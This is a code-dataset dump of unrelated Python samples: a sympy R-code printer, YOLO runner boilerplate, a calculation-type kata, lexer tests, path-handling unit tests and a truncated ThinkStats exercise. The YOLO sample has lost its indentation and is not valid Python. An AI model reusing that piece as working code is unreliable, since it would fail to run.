        #elif isinstance(lhs, MatrixSymbol):
        if isinstance(lhs, MatrixSymbol):
            # Here we form an Assignment for each element in the array,
            # printing each one.
            lines = []
            for (i, j) in self._traverse_matrix_indices(lhs):
                temp = Assignment(lhs[i, j], rhs[i, j])
                code0 = self._print(temp)
                lines.append(code0)
            return "\n".join(lines)
        elif self._settings["contract"] and (lhs.has(IndexedBase) or
                rhs.has(IndexedBase)):
            # Here we check if there is looping to be done, and if so
            # print the required loops.
            return self._doprint_loops(rhs, lhs)
        else:
            lhs_code = self._print(lhs)
            rhs_code = self._print(rhs)
            return self._get_statement("%s = %s" % (lhs_code, rhs_code))

    def _print_Piecewise(self, expr):
        # This method is called only for inline if constructs
        # Top level piecewise is handled in doprint()
        # Build nested ifelse(...) calls from the last branch outwards; a
        # missing default branch falls through to NA.
        if expr.args[-1].cond == True:
            last_line = "%s" % self._print(expr.args[-1].expr)
        else:
            last_line = "ifelse(%s,%s,NA)" % (self._print(expr.args[-1].cond), self._print(expr.args[-1].expr))
        code=last_line
        for e, c in reversed(expr.args[:-1]):
            code= "ifelse(%s,%s," % (self._print(c), self._print(e))+code+")"
        return(code)

    def _print_ITE(self, expr):
        # An if-then-else expression prints as a two-branch Piecewise.
        from sympy.functions import Piecewise
        _piecewise = Piecewise((expr.args[1], expr.args[0]), (expr.args[2], True))
        return self._print(_piecewise)

    def _print_MatrixElement(self, expr):
        # Matrices are addressed with a single row-major linear index.
        return "{0}[{1}]".format(self.parenthesize(expr.parent, PRECEDENCE["Atom"],
            strict=True), expr.j + expr.i*expr.parent.shape[1])

    def _print_Symbol(self, expr):
        name = super(RCodePrinter, self)._print_Symbol(expr)
        if expr in self._dereference:
            # Symbols flagged via the 'dereference' setting print as (*name).
            return '(*{0})'.format(name)
        else:
            return name

    def _print_Relational(self, expr):
        lhs_code = self._print(expr.lhs)
        rhs_code = self._print(expr.rhs)
        op = expr.rel_op
        return "{0} {1} {2}".format(lhs_code, op, rhs_code)

    def _print_sinc(self, expr):
        # sinc has no R builtin; expand to sin(x)/x with the limit 1 at x == 0.
        from sympy.functions.elementary.trigonometric import sin
        from sympy.core.relational import Ne
        from sympy.functions import Piecewise
        _piecewise = Piecewise(
            (sin(expr.args[0]) / expr.args[0], Ne(expr.args[0], 0)), (1, True))
        return self._print(_piecewise)

    def _print_AugmentedAssignment(self, expr):
        """Print an augmented assignment such as ``x += y;``."""
        lhs_code = self._print(expr.lhs)
        op = expr.op
        rhs_code = self._print(expr.rhs)
        return "{0} {1} {2};".format(lhs_code, op, rhs_code)

    def _print_For(self, expr):
        # NOTE(review): this emits a C-style for-loop, not R's
        # ``for (i in ...)`` form -- TODO confirm this is intended output.
        target = self._print(expr.target)
        if isinstance(expr.iterable, Range):
            start, stop, step = expr.iterable.args
        else:
            raise NotImplementedError("Only iterable currently supported is Range")
        body = self._print(expr.body)
        return ('for ({target} = {start}; {target} < {stop}; {target} += '
                '{step}) {{\n{body}\n}}').format(target=target, start=start,
                stop=stop, step=step, body=body)

    def indent_code(self, code):
        """Accepts a string of code or a list of code lines"""
        if isinstance(code, str):
            code_lines = self.indent_code(code.splitlines(True))
            return ''.join(code_lines)
        tab = " "
        inc_token = ('{', '(', '{\n', '(\n')
        dec_token = ('}', ')')
        # Strip existing indentation, then re-indent from bracket depth.
        code = [ line.lstrip(' \t') for line in code ]
        increase = [ int(any(map(line.endswith, inc_token))) for line in code ]
        decrease = [ int(any(map(line.startswith, dec_token)))
                     for line in code ]
        pretty = []
        level = 0
        for n, line in enumerate(code):
            if line == '' or line == '\n':
                pretty.append(line)
                continue
            level -= decrease[n]
            pretty.append("%s%s" % (tab*level, line))
            level += increase[n]
        return pretty
def rcode(expr, assign_to=None, **settings):
    """Converts an expr to a string of r code

    Parameters
    ==========

    expr : Expr
        A sympy expression to be converted.
    assign_to : optional
        When given, the argument is used as the name of the variable to which
        the expression is assigned. Can be a string, ``Symbol``,
        ``MatrixSymbol``, or ``Indexed`` type. This is helpful in case of
        line-wrapping, or for expressions that generate multi-line statements.
    precision : integer, optional
        The precision for numbers such as pi [default=15].
    user_functions : dict, optional
        A dictionary where the keys are string representations of either
        ``FunctionClass`` or ``UndefinedFunction`` instances and the values
        are their desired R string representations. Alternatively, the
        dictionary value can be a list of tuples i.e. [(argument_test,
        rfunction_string)] or [(argument_test, rfunction_formater)]. See below
        for examples.
    human : bool, optional
        If True, the result is a single string that may contain some constant
        declarations for the number symbols. If False, the same information is
        returned in a tuple of (symbols_to_declare, not_supported_functions,
        code_text). [default=True].
    contract: bool, optional
        If True, ``Indexed`` instances are assumed to obey tensor contraction
        rules and the corresponding nested loops over indices are generated.
        Setting contract=False will not generate loops, instead the user is
        responsible to provide values for the indices in the code.
        [default=True].

    Examples
    ========

    >>> from sympy import rcode, symbols, Rational, sin, ceiling, Abs, Function
    >>> x, tau = symbols("x, tau")
    >>> rcode((2*tau)**Rational(7, 2))
    '8*sqrt(2)*tau^(7.0/2.0)'
    >>> rcode(sin(x), assign_to="s")
    's = sin(x);'

    Simple custom printing can be defined for certain types by passing a
    dictionary of {"type" : "function"} to the ``user_functions`` kwarg.
    Alternatively, the dictionary value can be a list of tuples i.e.
    [(argument_test, cfunction_string)].

    >>> custom_functions = {
    ...   "ceiling": "CEIL",
    ...   "Abs": [(lambda x: not x.is_integer, "fabs"),
    ...           (lambda x: x.is_integer, "ABS")],
    ...   "func": "f"
    ... }
    >>> func = Function('func')
    >>> rcode(func(Abs(x) + ceiling(x)), user_functions=custom_functions)
    'f(fabs(x) + CEIL(x))'

    or if the R-function takes a subset of the original arguments:

    >>> rcode(2**x + 3**x, user_functions={'Pow': [
    ...   (lambda b, e: b == 2, lambda b, e: 'exp2(%s)' % e),
    ...   (lambda b, e: b != 2, 'pow')]})
    'exp2(x) + pow(3, x)'

    ``Piecewise`` expressions are converted into conditionals. If an
    ``assign_to`` variable is provided an if statement is created, otherwise
    the ternary operator is used. Note that if the ``Piecewise`` lacks a
    default term, represented by ``(expr, True)`` then an error will be thrown.
    This is to prevent generating an expression that may not evaluate to
    anything.

    >>> from sympy import Piecewise
    >>> expr = Piecewise((x + 1, x > 0), (x, True))
    >>> print(rcode(expr, assign_to=tau))
    tau = ifelse(x > 0,x + 1,x);

    Support for loops is provided through ``Indexed`` types. With
    ``contract=True`` these expressions will be turned into loops, whereas
    ``contract=False`` will just print the assignment expression that should be
    looped over:

    >>> from sympy import Eq, IndexedBase, Idx
    >>> len_y = 5
    >>> y = IndexedBase('y', shape=(len_y,))
    >>> t = IndexedBase('t', shape=(len_y,))
    >>> Dy = IndexedBase('Dy', shape=(len_y-1,))
    >>> i = Idx('i', len_y-1)
    >>> e=Eq(Dy[i], (y[i+1]-y[i])/(t[i+1]-t[i]))
    >>> rcode(e.rhs, assign_to=e.lhs, contract=False)
    'Dy[i] = (y[i + 1] - y[i])/(t[i + 1] - t[i]);'

    Matrices are also supported, but a ``MatrixSymbol`` of the same dimensions
    must be provided to ``assign_to``. Note that any expression that can be
    generated normally can also exist inside a Matrix:

    >>> from sympy import Matrix, MatrixSymbol
    >>> mat = Matrix([x**2, Piecewise((x + 1, x > 0), (x, True)), sin(x)])
    >>> A = MatrixSymbol('A', 3, 1)
    >>> print(rcode(mat, A))
    A[0] = x^2;
    A[1] = ifelse(x > 0,x + 1,x);
    A[2] = sin(x);
    """
    # Delegate to the printer; doprint handles assign_to targets and the
    # multi-line constructs (loops, matrices, piecewise).
    return RCodePrinter(settings).doprint(expr, assign_to)
def print_rcode(expr, **settings):
    """Print the R source generated for *expr* to standard output."""
    r_source = rcode(expr, **settings)
    print(r_source)
| StarcoderdataPython |
1770088 | <gh_stars>0
from ...hek.defs.phys import *
| StarcoderdataPython |
3299795 | <reponame>Ruzil357/YoloCustomDatasetBoilerPlate_v4
from json import load
from utils.yolo_v4 import run as run_v4
from utils.yolo_v5 import run as run_v5
with open("config.json", "r") as file:
_YOLO_VERSION = load(file)["yolo_version"]
def main():
    """Run the detector matching the configured YOLO version.

    Unknown versions are silently ignored, matching the original behaviour.
    """
    runners = {4: run_v4, 5: run_v5}
    selected = runners.get(_YOLO_VERSION)
    if selected is not None:
        selected.main()
if __name__ == '__main__':
main() | StarcoderdataPython |
1691170 | <filename>kata/07/find_calc_type.py
"""
Based on those 3 values you have to return a string, that describes which operation was used to get the given result.
The possible return strings are: "addition", "subtraction", "multiplication", "division".
Notes
In case of division you should expect that the result of the operation is obtained by using / operator on the input values - no manual data type conversion or rounding should be performed.
Cases with just one possible answers are generated.
Only valid arguments will be passed to the function.
Only valid arguments will be passed to the function!
"""
def calc_type(a: int, b: int, res: int) -> str:
    """Find the calculation type by the result.

    Examples:
        >>> assert calc_type(10, 2, 5) == 'division'

    Raises KeyError if *res* matches none of the four operations, and
    ZeroDivisionError if b == 0 (only valid arguments are expected).
    """
    outcomes = (
        (a - b, 'subtraction'),
        (a + b, 'addition'),
        (a / b, 'division'),
        (a * b, 'multiplication'),
    )
    # Scan from the end so that, when two operations collide on the same
    # result, the later one wins -- exactly like duplicate keys in the
    # original dict literal.
    for value, name in reversed(outcomes):
        if value == res:
            return name
    raise KeyError(res)
if __name__ == '__main__':
print(calc_type(10, 2, 5))
| StarcoderdataPython |
3397041 | <filename>tests/test_lexer/test_tokens.py
# coding: utf-8
from __future__ import division, print_function, unicode_literals
import pytest
from six.moves import range
from formatcode.lexer.tokens import (AmPmToken, AsteriskSymbol, AtSymbol, BlockDelimiter, ColorToken, CommaDelimiter,
ConditionToken, DateTimeToken, DotDelimiter, EToken, GeneralToken, HashToken,
LocaleCurrencyToken, PercentageSymbol, QToken, SlashSymbol, StringSymbol,
TimeDeltaToken, UnderscoreSymbol, ZeroToken)
# Single-character / keyword tokens: match() returns the number of consumed
# characters (or None on no match); the constructed token exposes the parsed
# text via cleaned_data (or a typed value via .value).
def test_general_token():
    assert GeneralToken.match('General') == len('General')
    assert GeneralToken.match('1') is None
    assert GeneralToken('General').cleaned_data == 'General'
def test_slash_token():
    # A bare '/' has no denominator value; '/1234' parses the trailing int.
    assert SlashSymbol.match('/') == 1
    assert SlashSymbol.match('1') is None
    assert SlashSymbol('/').value is None
    assert SlashSymbol.match('/1234') == 5
    assert SlashSymbol('/1234').value == 1234
def test_block_delimiter():
    assert BlockDelimiter.match(';') == 1
    assert BlockDelimiter.match('1') is None
    assert BlockDelimiter(';').cleaned_data == ';'
def test_zero():
    assert ZeroToken.match('0') == 1
    assert ZeroToken.match('1') is None
    assert ZeroToken('0').cleaned_data == '0'
def test_q():
    assert QToken.match('?') == 1
    assert QToken.match('1') is None
    assert QToken('?').cleaned_data == '?'
def test_hash():
    assert HashToken.match('#') == 1
    assert HashToken.match('1') is None
    assert HashToken('#').cleaned_data == '#'
# Separator / placeholder symbols.
def test_comma():
    assert CommaDelimiter.match(',') == 1
    assert CommaDelimiter.match('1') is None
    assert CommaDelimiter(',').cleaned_data == ','
def test_fraction():
    assert DotDelimiter.match('.') == 1
    assert DotDelimiter.match('1') is None
    assert DotDelimiter('.').cleaned_data == '.'
def test_percentage():
    assert PercentageSymbol.match('%') == 1
    assert PercentageSymbol.match('1') is None
    assert PercentageSymbol('%').cleaned_data == '%'
def test_at():
    assert AtSymbol.match('@') == 1
    assert AtSymbol.match('1') is None
    assert AtSymbol('@').cleaned_data == '@'
def test_asterisk():
    # '*' consumes the repeated fill character that follows it.
    assert AsteriskSymbol.match('*0') == 2
    assert AsteriskSymbol.match('1') is None
    assert AsteriskSymbol('*0').value == '0'
def test_underscore():
    assert UnderscoreSymbol.match('_') == 1
    assert UnderscoreSymbol.match('1') is None
    assert UnderscoreSymbol('_').cleaned_data == '_'
# Literal characters that need no escaping inside a format code.
@pytest.mark.parametrize('line', ['$', '+', '-', '(', ')', ':', '!', '^',
                                  '&', "'", '~', '{', '}', '<', '>', '=', ' '])
def test_string_without_escape(line):
    assert StringSymbol.match(line) == 1
    assert StringSymbol(line).value == line
# Backslash-escaped characters: two chars consumed, value is the escaped char.
@pytest.mark.parametrize('line', [r'\%s' % chr(i) for i in range(33, 256)])
def test_string_with_escape(line):
    assert StringSymbol.match(line) == 2
    assert StringSymbol(line).value == line[1]
def test_string_with_quote():
    # Double-quoted literals: the quotes are consumed but not part of .value;
    # an unterminated quote does not match.
    assert StringSymbol.match('"hello"') == 7
    assert StringSymbol('"hello"').value == 'hello'
    assert StringSymbol.match('"bye"') == 5
    assert StringSymbol('"bye"').value == 'bye'
    assert StringSymbol.match('"12345"') == 7
    assert StringSymbol('"12345"').value == '12345'
    assert StringSymbol.match('"') is None
# Scientific-notation marker: 'E'/'e' plus a mandatory sign, prefix-matched only.
@pytest.mark.parametrize('letter', ['E', 'e'])
@pytest.mark.parametrize('sign', ['-', '+'])
def test_scientific_notation(letter, sign):
    line = letter + sign
    assert EToken.match(line) == len(line)
    token = EToken(line)
    assert token.value == sign
    assert EToken.match(line + 'test') == len(line)
    assert EToken.match('test' + line) is None
# Bracketed color names/indices: both brackets are required.
@pytest.mark.parametrize('line', ['Black', 'Green', 'White', 'Blue', 'Magenta', 'Yellow', 'Cyan', 'Red',
                                  'Color1', 'Color14', 'Color39', 'Color56'])
def test_color(line):
    assert ColorToken.match('[%s]' % line) == len(line) + 2
    assert ColorToken('[%s]' % line).value == line
    assert ColorToken.match(line) is None
    assert ColorToken.match('[' + line) is None
    assert ColorToken.match(line + ']') is None
# Bracketed comparisons like [>=-123.45]: operator and signed value are parsed.
@pytest.mark.parametrize('op', ['<', '>', '=', '<>', '<=', '>='])
@pytest.mark.parametrize('value', [1, 123, 12345, 123.45, 0.1234])
@pytest.mark.parametrize('sign', ['-', '', '+'])
def test_condition(op, value, sign):
    signed_value = (value * -1) if sign == '-' else value
    assert ConditionToken.match('[%s%s%s]' % (op, sign, value)) == len(op) + len(str(value)) + 2 + len(sign)
    token = ConditionToken('[%s%s%s]' % (op, sign, value))
    assert token.op == op
    assert token.value == signed_value
    assert ConditionToken.match('[%s]' % signed_value) is None
    assert ConditionToken.match('%s' % signed_value) is None
# Bare date/time field codes (no brackets allowed).
@pytest.mark.parametrize('line', ['yy', 'yyyy', 'm', 'mm', 'mmm', 'mmmm', 'mmmmm',
                                  'd', 'dd', 'ddd', 'dddd', 'h', 'hh', 's', 'ss'])
def test_date(line):
    assert DateTimeToken.match(line) == len(line)
    assert DateTimeToken(line).value == line
    assert DateTimeToken.match('[%s]' % line) is None
# Elapsed-time fields are the opposite: brackets are mandatory.
@pytest.mark.parametrize('line', ['h', 'm', 's'])
@pytest.mark.parametrize('count', [1, 2, 4, 8])
def test_timedelta(line, count):
    line = ''.join([line] * count)
    assert TimeDeltaToken.match(line) is None
    assert TimeDeltaToken.match('[%s]' % line) == len(line) + 2
    assert TimeDeltaToken('[%s]' % line).value == line
@pytest.mark.parametrize('line', ['AM/PM', 'A/P'])
def test_am_pm(line):
    assert AmPmToken.match(line) == len(line)
    assert AmPmToken(line).value == line
def test_locale_currency():
    # [$CURR-LCID]: currency string plus hex locale id ('409' hex == 1033).
    assert LocaleCurrencyToken.match('[$USD-409]') == 10
    token = LocaleCurrencyToken('[$USD-409]')
    assert token.curr == 'USD'
    assert token.language_id == 1033
    assert token.calendar_type == 0
    assert token.number_system == 0
    # Currency only: locale fields stay None.
    assert LocaleCurrencyToken.match('[$USD]') == 6
    token = LocaleCurrencyToken('[$USD]')
    assert token.curr == 'USD'
    assert token.language_id is None
    assert token.calendar_type is None
    assert token.number_system is None
    # Locale-id only, with optional calendar/number-system hex bytes;
    # 'ffffffff' splits into number_system=0xff, calendar=0xff, lcid=0xffff.
    assert LocaleCurrencyToken.match('[$-409]') == 7
    assert LocaleCurrencyToken.match('[$-f409]') == 8
    assert LocaleCurrencyToken.match('[$-ffffffff]') == 12
    token = LocaleCurrencyToken('[$-ffffffff]')
    assert token.curr == ''
    assert token.language_id == 65535
    assert token.calendar_type == 255
    assert token.number_system == 255
    # A '$' may itself be the currency symbol; >8 hex digits is rejected.
    assert LocaleCurrencyToken.match('[$$-ffffffff]') == 13
    assert LocaleCurrencyToken.match('[$$-fffffffff]') is None
    assert LocaleCurrencyToken.match('[-fffffffff]') is None
| StarcoderdataPython |
20607 | """ test gpath
isort:skip_file
"""
import os
import sys
import unittest
try:
from unittest import mock
except ImportError:
import mock
SRC = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "src")
if SRC not in sys.path:
sys.path.insert(0, SRC)
from ciopath.gpath import Path
sys.modules["glob"] = __import__("mocks.glob", fromlist=["dummy"])
class BadInputTest(unittest.TestCase):
def test_empty_input(self):
with self.assertRaises(ValueError):
self.p = Path("")
class RootPath(unittest.TestCase):
def test_root_path(self):
self.p = Path("/")
self.assertEqual(self.p.fslash(), "/")
self.assertEqual(self.p.bslash(), "\\")
def test_drive_letter_root_path(self):
self.p = Path("C:\\")
self.assertEqual(self.p.fslash(), "C:/")
self.assertEqual(self.p.bslash(), "C:\\")
class SpecifyDriveLetterUse(unittest.TestCase):
def test_remove_from_path(self):
self.p = Path("C:\\a\\b\\c")
self.assertEqual(self.p.fslash(with_drive=False), "/a/b/c")
self.assertEqual(self.p.bslash(with_drive=False), "\\a\\b\\c")
def test_remove_from_root_path(self):
self.p = Path("C:\\")
self.assertEqual(self.p.fslash(with_drive=False), "/")
self.assertEqual(self.p.bslash(with_drive=False), "\\")
class AbsPosixPathTest(unittest.TestCase):
def setUp(self):
self.p = Path("/a/b/c")
def test_fslash_out(self):
self.assertEqual(self.p.fslash(), "/a/b/c")
def test_win_path_out(self):
self.assertEqual(self.p.bslash(), "\\a\\b\\c")
class AbsWindowsPathTest(unittest.TestCase):
def setUp(self):
self.p = Path("C:\\a\\b\\c")
def test_fslash_out(self):
self.assertEqual(self.p.fslash(), "C:/a/b/c")
def test_win_path_out(self):
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c")
# consider just testing on both platforms
def test_os_path_out(self):
with mock.patch("os.name", "posix"):
self.assertEqual(self.p.os_path(), "C:/a/b/c")
with mock.patch("os.name", "nt"):
self.assertEqual(self.p.os_path(), "C:\\a\\b\\c")
class PathStringTest(unittest.TestCase):
def test_path_emits_string_posix(self):
input_file = "/path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
def test_path_emits_string_with_drive(self):
input_file = "C:/path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
def test_path_emits_string_relative(self):
input_file = "path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
class WindowsMixedPathTest(unittest.TestCase):
def test_abs_in_fslash_out(self):
self.p = Path("\\a\\b\\c/d/e")
self.assertEqual(self.p.fslash(), "/a/b/c/d/e")
def test_abs_in_bslash_out(self):
self.p = Path("\\a\\b\\c/d/e")
self.assertEqual(self.p.bslash(), "\\a\\b\\c\\d\\e")
def test_letter_abs_in_fslash_out(self):
self.p = Path("C:\\a\\b\\c/d/e")
self.assertEqual(self.p.fslash(), "C:/a/b/c/d/e")
def test_letter_abs_in_bslash_out(self):
self.p = Path("C:\\a\\b\\c/d/e")
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c\\d\\e")
class MiscPathTest(unittest.TestCase):
def test_many_to_single_backslashes_bslash_out(self):
self.p = Path("C:\\\\a\\b///c")
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c")
class PathExpansionTest(unittest.TestCase):
def setUp(self):
self.env = {
"HOME": "/users/joebloggs",
"SHOT": "/metropolis/shot01",
"DEPT": "texturing",
}
def test_posix_tilde_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("~/a/b/c")
self.assertEqual(self.p.fslash(), "/users/joebloggs/a/b/c")
def test_posix_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c")
self.assertEqual(self.p.fslash(), "/metropolis/shot01/a/b/c")
def test_posix_two_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/$DEPT/c")
self.assertEqual(self.p.fslash(), "/metropolis/shot01/a/b/texturing/c")
def test_windows_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$HOME\\a\\b\\c")
self.assertEqual(self.p.bslash(), "\\users\\joebloggs\\a\\b\\c")
self.assertEqual(self.p.fslash(), "/users/joebloggs/a/b/c")
def test_tilde_no_expand(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("~/a/b/c", no_expand=True)
self.assertEqual(self.p.fslash(), "~/a/b/c")
def test_posix_var_no_expand(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=True)
self.assertEqual(self.p.fslash(), "$SHOT/a/b/c")
def no_expand_variable_considered_relative(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=True)
self.assertTrue(self.p.relative)
self.assertFalse(self.p.absolute)
def expanded_variable_considered_absolute(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=False)
self.assertFalse(self.p.relative)
self.assertTrue(self.p.absolute)
class PathContextExpansionTest(unittest.TestCase):
def setUp(self):
self.env = {
"HOME": "/users/joebloggs",
"SHOT": "/metropolis/shot01",
"DEPT": "texturing",
}
self.context = {
"HOME": "/users/janedoe",
"FOO": "fooval",
"BAR_FLY1_": "bar_fly1_val",
"ROOT_DIR": "/some/root",
}
def test_path_replaces_context(self):
self.p = Path("$ROOT_DIR/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/thefile.jpg")
def test_path_replaces_multiple_context(self):
self.p = Path("$ROOT_DIR/$BAR_FLY1_/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/thefile.jpg")
def test_path_context_overrides_env(self):
self.p = Path("$HOME/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/users/janedoe/thefile.jpg")
def test_path_leave_unknown_variable_in_tact(self):
self.p = Path("$ROOT_DIR/$BAR_FLY1_/$FOO/thefile.$F.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/fooval/thefile.$F.jpg")
def test_path_replaces_context_braces(self):
self.p = Path("${ROOT_DIR}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/thefile.jpg")
def test_path_replaces_multiple_context_braces(self):
self.p = Path("${ROOT_DIR}/${BAR_FLY1_}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/thefile.jpg")
def test_path_context_overrides_env_braces(self):
self.p = Path("${HOME}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/users/janedoe/thefile.jpg")
def test_path_leave_unknown_variable_in_tact_braces(self):
self.p = Path("${ROOT_DIR}/${BAR_FLY1_}/${FOO}/thefile.$F.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/fooval/thefile.$F.jpg")
class PathLengthTest(unittest.TestCase):
def test_len_with_drive_letter(self):
self.p = Path("C:\\aaa\\bbb/c")
self.assertEqual(len(self.p), 12)
def test_len_with_no_drive_letter(self):
self.p = Path("\\aaa\\bbb/c")
self.assertEqual(len(self.p), 10)
def test_depth_with_drive_letter(self):
self.p = Path("C:\\aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
def test_depth_with_no_drive_letter(self):
self.p = Path("\\aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
def test_depth_with_literal_rel_path(self):
self.p = Path("aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
class AbsolutePathCollapseDotsTest(unittest.TestCase):
def test_path_collapses_single_dot(self):
p = Path("/a/b/./c")
self.assertEqual(p.fslash(), "/a/b/c")
def test_path_collapses_double_dot(self):
p = Path("/a/b/../c")
self.assertEqual(p.fslash(), "/a/c")
def test_path_collapses_many_single_dots(self):
p = Path("/a/b/./c/././d")
self.assertEqual(p.fslash(), "/a/b/c/d")
def test_path_collapses_many_consecutive_double_dots(self):
p = Path("/a/b/c/../../d")
self.assertEqual(p.fslash(), "/a/d")
def test_path_collapses_many_non_consecutive_double_dots(self):
p = Path("/a/b/c/../../d/../e/f/../g")
self.assertEqual(p.fslash(), "/a/e/g")
def test_path_collapses_many_non_consecutive_mixed_dots(self):
p = Path("/a/./b/c/../.././d/../././e/f/../g/./")
self.assertEqual(p.fslash(), "/a/e/g")
self.assertEqual(p.depth, 3)
def test_path_collapses_to_root(self):
p = Path("/a/b/../../")
self.assertEqual(p.fslash(), "/")
self.assertEqual(p.depth, 0)
def test_raise_when_collapse_too_many_dots(self):
with self.assertRaises(ValueError):
Path("/a/b/../../../")
class RelativePathCollapseDotsTest(unittest.TestCase):
    """Dot-segment ('.', '..') collapsing for relative paths."""

    def test_resolve_relative_several_dots(self):
        p = Path("./a/b/../../../c/d")
        self.assertEqual(p.fslash(), "../c/d")
        self.assertEqual(p.all_components, ["..", "c", "d"])
        self.assertEqual(p.depth, 3)
    def test_resolve_leading_relative_dots(self):
        p = Path("../c/d")
        self.assertEqual(p.fslash(), "../c/d")
    # BUG FIX: this method previously reused the name
    # test_resolve_leading_relative_dots, so it shadowed the method above and
    # the single-'..' case was never executed. Renamed so both tests run.
    def test_resolve_many_leading_relative_dots(self):
        p = Path("../../../c/d")
        self.assertEqual(p.fslash(), "../../../c/d")
    def test_resolve_only_relative_dots(self):
        p = Path("../../../")
        self.assertEqual(p.fslash(), "../../../")
    def test_collapse_contained_components(self):
        p = Path("../../../a/b/../../../")
        self.assertEqual(p.fslash(), "../../../../")
    def test_remove_trailing_dot(self):
        p = Path("../../.././")
        self.assertEqual(p.fslash(), "../../../")
    def test_cwd(self):
        p = Path(".")
        self.assertEqual(p.fslash(), "./")
    def test_down_up_cwd(self):
        p = Path("a/..")
        self.assertEqual(p.fslash(), "./")
    def test_up_down_sibling(self):
        p = Path("../a")
        self.assertEqual(p.fslash(), "../a")
    def test_up_down_sibling_bslash(self):
        p = Path("../a")
        self.assertEqual(p.bslash(), "..\\a")
class PathComponentsTest(unittest.TestCase):
def test_path_gets_tail(self):
p = Path("/a/b/c")
self.assertEqual(p.tail, "c")
def test_path_gets_none_when_no_tail(self):
p = Path("/")
self.assertEqual(p.tail, None)
def test_path_ends_with(self):
p = Path("/a/b/cdef")
self.assertTrue(p.endswith("ef"))
def test_path_not_ends_with(self):
p = Path("/a/b/cdef")
self.assertFalse(p.endswith("eg"))
class RelativePathTest(unittest.TestCase):
def test_rel_path_does_not_raise(self):
p = Path("a/b/c")
self.assertEqual(p.fslash(), "a/b/c")
class EqualityTests(unittest.TestCase):
def test_paths_equal(self):
p1 = Path("a/b/c")
p2 = Path("a/b/c")
self.assertTrue(p1 == p2)
def test_same_object_equal(self):
p1 = Path("a/b/c")
self.assertTrue(p1 == p1)
def test_different_paths_equal_false(self):
p1 = Path("a/b/c")
p2 = Path("a/b/d")
self.assertFalse(p1 == p2)
def test_paths_not_equal(self):
p1 = Path("a/b/c")
p2 = Path("a/b/d")
self.assertTrue(p1 != p2)
class InitializeWithComponentsTests(unittest.TestCase):
def test_initialize_with_lettered_components(self):
p = Path(["C:", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "C:/a/b/c")
def test_initialize_with_backslash_unc_components(self):
p = Path(["\\", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_initialize_with_fwslash_unc_components(self):
p = Path(["/", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_initialize_with_unc_components(self):
p = Path(["/", "a", "b", "c"])
self.assertEqual(p.bslash(with_drive=True), "\\\\a\\b\\c")
def test_initialize_with_relative_components(self):
p = Path(["a", "b", "c"])
self.assertEqual(p.bslash(with_drive=True), "a\\b\\c")
def test_initialize_with_relative_components_is_relative(self):
p = Path(["a", "b", "c"])
self.assertTrue(p.relative)
self.assertFalse(p.absolute)
class GetComponentsTests(unittest.TestCase):
def test_get_all_components(self):
p = Path("/a/b/c")
self.assertEqual(p.all_components, ["a", "b", "c"])
def test_get_all_components_with_drive(self):
p = Path("C:/a/b/c")
self.assertEqual(p.all_components, ["C:", "a", "b", "c"])
def test_get_all_components_with_unc_fwslash(self):
p = Path("//a/b/c")
self.assertEqual(p.all_components, ["/", "a", "b", "c"])
def test_get_all_components_with_unc_backslash(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.all_components, ["/", "a", "b", "c"])
class UNCTests(unittest.TestCase):
def test_unc_root_with_drive(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_unc_is_absolute(self):
p = Path("\\\\a\\b\\c")
self.assertTrue(p.absolute)
def test_unc_root_without_drive(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.fslash(with_drive=False), "/a/b/c")
def test_unc_root_with_forward(self):
p = Path("//a/b/c")
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_is_unc(self):
p = Path("\\\\a\\b\\c")
self.assertTrue(p.is_unc)
p = Path("//a/b/c")
self.assertTrue(p.is_unc)
def test_posix_abs_is_not_unc(self):
p = Path(["/a/b/c"])
self.assertFalse(p.is_unc)
def test_relative_is_not_unc(self):
p = Path(["a/b/c"])
self.assertFalse(p.is_unc)
def test_drive_letter_is_not_unc(self):
p = Path("C:\\aaa\\bbb\\c")
self.assertFalse(p.is_unc)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
1797000 | <filename>Downey2011_exes/exe_02-01.py
#!/usr/bin/python
# vim: set fileencoding=utf8 :
"""
# UFRJ - PPGI
# MAB719
# <NAME> <<EMAIL>>
ThinkStats: Exercício 2.1
"""
import thinkstats
import math
_pumpkins_weight = [1, 1, 1, 3, 3, 591]
def Pumpkin(pumpkins_weight):
    """
